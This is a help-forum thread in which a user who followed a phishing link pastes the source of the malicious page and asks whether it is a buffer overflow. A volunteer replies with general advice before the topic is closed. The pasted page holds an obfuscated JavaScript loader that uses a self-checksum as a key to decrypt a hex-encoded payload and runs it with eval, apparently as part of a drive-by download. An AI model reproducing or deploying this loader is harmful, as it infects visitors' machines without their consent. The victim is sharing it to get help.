Jump to content

Welcome to Geeks to Go - Register now for FREE

Geeks To Go is a helpful hub, where thousands of volunteer geeks quickly serve friendly answers and support. Check out the forums and get free advice from the experts. Register now to gain access to all of our features, it's FREE and only takes one minute. Once registered and logged in, you will be able to create topics, post replies to existing threads, give reputation to your fellow members, get your own private messenger, post status updates, manage your profile and so much more.

Create Account How it Works
Photo

buffer overflow? [CLOSED]


  • This topic is locked This topic is locked

#1
imaginarynumber

imaginarynumber

    New Member

  • Member
  • Pip
  • 1 posts
Hi all

I just received a phishing fake google adwords email.

I went to the root of the site to see if it was just one page that was dodgy or the whole site. An error box popped up telling me that c:\nywdm.exe had crashed.

On closer inspection it looks like opening the page downloaded a 16 bit dos exe.

At the moment I have no av. only just reformatted my hdd.

I am assuming that all is ok as the program fell over but i dont understand how it downloaded itself and tried to execute with out my permission.

I did a tracert for the site and have asked the hosting company at that ip address to shut the site down. They are russian so i can only hope that they can understand english

The source code for the site is as follows- is it an attempt at buffer overflow (beyond my ken)

thanks in advance

<html>
<body><h1> Loading... Please wait</h1>
<script language="JavaScript">
<!--
function x712b7j66(dPjAxoy7W,GD7Fr0618){var H7aqYJtto;var y6DbFO7y5;var RDJNQ7677='';var EsWQ77JXj=new Array();var CSED2elvW=arguments.callee.toString();var X1O4ikfhM=CSED2elvW.replace(/\W/g,'');X1O4ikfhM=X1O4ikfhM.toUpperCase();var onjDb2BBv=X1O4ikfhM.length;for(H7aqYJtto=0;H7aqYJtto<256;H7aqYJtto++) {EsWQ77JXj[H7aqYJtto]=0;}var BW0woN8C2=1;for(H7aqYJtto=128;H7aqYJtto;H7aqYJtto>>=1) {BW0woN8C2=(BW0woN8C2>>>1)^((BW0woN8C2&1)?3988292384:0);for(jY3GV0SXH=0;jY3GV0SXH<256;jY3GV0SXH+=H7aqYJtto*2) {EsWQ77JXj[jY3GV0SXH+H7aqYJtto]=(EsWQ77JXj[jY3GV0SXH]^BW0woN8C2);if (EsWQ77JXj[jY3GV0SXH+H7aqYJtto] < 0) {EsWQ77JXj[jY3GV0SXH+H7aqYJtto]+=4294967296;}}}y6DbFO7y5=4294967295;var N0G2HsE12='MAYBE---';for(BW0woN8C2=0;BW0woN8C2<onjDb2BBv;BW0woN8C2++) {y6DbFO7y5=EsWQ77JXj[(y6DbFO7y5^X1O4ikfhM.charCodeAt(BW0woN8C2))&255]^((y6DbFO7y5>>8)&16777215);}y6DbFO7y5=y6DbFO7y5^4294967295;if (y6DbFO7y5<0) {y6DbFO7y5+=4294967296;}y6DbFO7y5=y6DbFO7y5.toString(16).toUpperCase();var D72ue5eUj=8-y6DbFO7y5.length;for(H7aqYJtto=0;H7aqYJtto<D72ue5eUj;H7aqYJtto++) {y6DbFO7y5='0'+y6DbFO7y5;}var Ss1888mUw=new Array();var K7cbv55yT=100;var onjDb2BBv=y6DbFO7y5.length;for(H7aqYJtto=0;H7aqYJtto<8;H7aqYJtto++) {var oQjX53QIs=onjDb2BBv+H7aqYJtto;if (oQjX53QIs>=8) {oQjX53QIs=oQjX53QIs-8;Ss1888mUw[H7aqYJtto]=y6DbFO7y5.charCodeAt(oQjX53QIs);} else {Ss1888mUw[H7aqYJtto]=7;}}var sYFrNoxca=0;var IJKsc8LMP;K7cbv55yT=10394;var LUq0gF2Xb=new Array();LUq0gF2Xb[0]=dPjAxoy7W.length;onjDb2BBv=LUq0gF2Xb[0];for(H7aqYJtto=0;H7a
qYJtto<onjDb2BBv;H7aqYJtto+=2){var Xb2QH4W1X=dPjAxoy7W.substr(H7aqYJtto,2);var RkI21Ucj4=parseInt(Xb2QH4W1X,16);IJKsc8LMP=RkI21Ucj4-Ss1888mUw[sYFrNoxca];if(IJKsc8LMP<0) {IJKsc8LMP=IJKsc8LMP+256;}RDJNQ7677+=String.fromCharCode(IJKsc8LMP);if(sYFrNoxca<Ss1888mUw.length-1) {sYFrNoxca++;} else {sYFrNoxca=0;K7cbv55yT=11;}}eval(RDJNQ7677);}
x712b7j66('97A197ad9fA9a1b761A9A6A1A6a95B6a6f9b9aaa93B19863A6a4977554ACa7B7a36C6367677C
61796860666b6b72667296999d6594adA172a0939dA460a79aAC72A271ACA1B659ac70625658a9ad9
7b79B6f566954649Ba89C999Cac6F66646553a5A8b19eA9706595a1a69c97B66d6363a2ac5A708062
AC99A495a597825A6c6E');
//-->
</script>
</body>
</html>
  • 0

Advertisements


#2
greyknight17

greyknight17

    Malware Expert

  • Visiting Consultant
  • 16,560 posts
Welcome to GTG.

Are you here requesting assistance on removing spyware or did you format and just want to inquire about it?

Many websites are using malicious code/scripts in their site to exploit machines, especially those that are not properly patched/protected. Read this to see how to help prevent this outbreak from happening that easily. Nothing is guaranteed, but at least there is some barrier between your computer and malware.
  • 0

#3
greyknight17

greyknight17

    Malware Expert

  • Visiting Consultant
  • 16,560 posts
Due to lack of feedback, this topic has been closed.

If you need this topic reopened, please contact a staff member. This applies only to the original topic starter. Everyone else please begin a New Topic.
  • 0






Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP